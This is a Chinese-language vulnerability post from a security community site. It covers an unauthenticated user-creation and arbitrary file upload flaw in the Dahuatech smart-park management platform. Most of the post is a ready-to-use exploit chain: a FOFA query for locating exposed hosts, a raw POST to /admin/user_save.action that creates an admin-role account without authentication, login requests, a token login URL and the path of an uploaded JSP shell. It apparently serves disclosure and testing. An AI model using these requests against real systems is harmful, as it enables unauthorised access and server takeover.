奇安信攻防社区-Dahuatech 智慧园区综合管理平台 user

Dahuatech 智慧园区综合管理平台 user_save.action 任意文件上传漏洞

# Dahuatech 智慧园区综合管理平台 user_save.action 任意文件上传漏洞 ## 漏洞描述 Dahuatech 智慧园区综合管理平台存在未授权访问漏洞，攻击者通过构造特殊的请求包可以创建新用户，再...

Dahuatech 智慧园区综合管理平台 user\_save.action 任意文件上传漏洞
===============================================

漏洞描述
----

Dahuatech 智慧园区综合管理平台存在未授权访问漏洞，攻击者通过构造特殊的请求包可以创建新用户，再利用文件上传漏洞获取服务器权限

漏洞影响
----

Dahuatech 智慧园区综合管理平台

网络测绘
----

app="Dahuatech-智慧园区综合管理平台"

漏洞复现
----

![img](https://shs3.b.qianxin.com/butian_public/f2709899e4eb9506bbda5c72e440abfdafee6d4eae8b4.jpg)

验证POC

```javascript
POST /admin/user_save.action HTTP/1.1
Host: 
Accept-Encoding: gzip
Content-Length: 914
Content-Type: multipart/form-data; boundary=----fxwrpqcy
Cookie: JSESSIONID=65A8F19555DC1EFB09B5A8B4F0F6921C
User-Agent: Go-http-client/1.1

------fxwrpqcy
Content-Disposition: form-data; name="userBean.userType"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.ownerCode"

001
------fxwrpqcy
Content-Disposition: form-data; name="userBean.isReuse"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.macStat"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.roleIds"

1
------fxwrpqcy
Content-Disposition: form-data; name="userBean.loginName"

luqaahkf
------fxwrpqcy
Content-Disposition: form-data; name="displayedOrgName"

luqaahkf
------fxwrpqcy
Content-Disposition: form-data; name="userBean.loginPass"

lhndpuxl
------fxwrpqcy
Content-Disposition: form-data; name="checkPass"

lhndpuxl
------fxwrpqcy
Content-Disposition: form-data; name="userBean.groupId"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.userName"

luqaahkf
------fxwrpqcy--
```

![img](https://shs3.b.qianxin.com/butian_public/f7273254c425d160643202c16030b8e24e7d5d7a0b4b0.jpg)

```javascript
POST /WPMS/getPublicKey HTTP/1.1
Host: 
Accept-Encoding: gzip
Content-Length: 25
Content-Type: application/json
User-Agent: Go-http-client/1.1

{"loginName":"luqaahkf"}
```

![img](https://shs3.b.qianxin.com/butian_public/f262110f1ac8dc4609db79fdcd52e608def11400d64ed.jpg)

```javascript
POST /WPMS/login HTTP/1.1
Host: 
Accept-Encoding: gzip
Content-Length: 271
Content-Type: application/json
User-Agent: Go-http-client/1.1

{"loginName":"luqaahkf","loginPass":"IxID6I8gKNSkCgu5UMwfRAhZpyvKKzu9q+dUngiieHiCTA52x3/uNB17NmAOletbzTOT46fLE5AOOMqMaqdDLA5rcsB3/Gql1qYwbNWLB6orKWpWEr9asUeNi/3ccIb95NUAXS1yn0l3ks94jbGT/CYbNq+JiBAeYlwcfdrqYkM=","timestamp":"16853622671401904168273612873678126378126387"}
```

![img](https://shs3.b.qianxin.com/butian_public/f631840e4bfb5a0ff0e3e760f67d94376687a6c27e058.jpg)

```javascript
/admin/login_login.action?subSystemToken=87a629bc14298c1533d8b52dd63e87f7
```

![img](https://shs3.b.qianxin.com/butian_public/f24521033415c481054a1306ce63cd928e4faa8b46d68.jpg)

```javascript
/upload/axqvssmz.jsp
```

发表于 2024-07-12 18:49:23
阅读 ( 973 )
分类：网络设备

Dahuatech 智慧园区综合管理平台 user_save.action 任意文件上传漏洞

0 条评论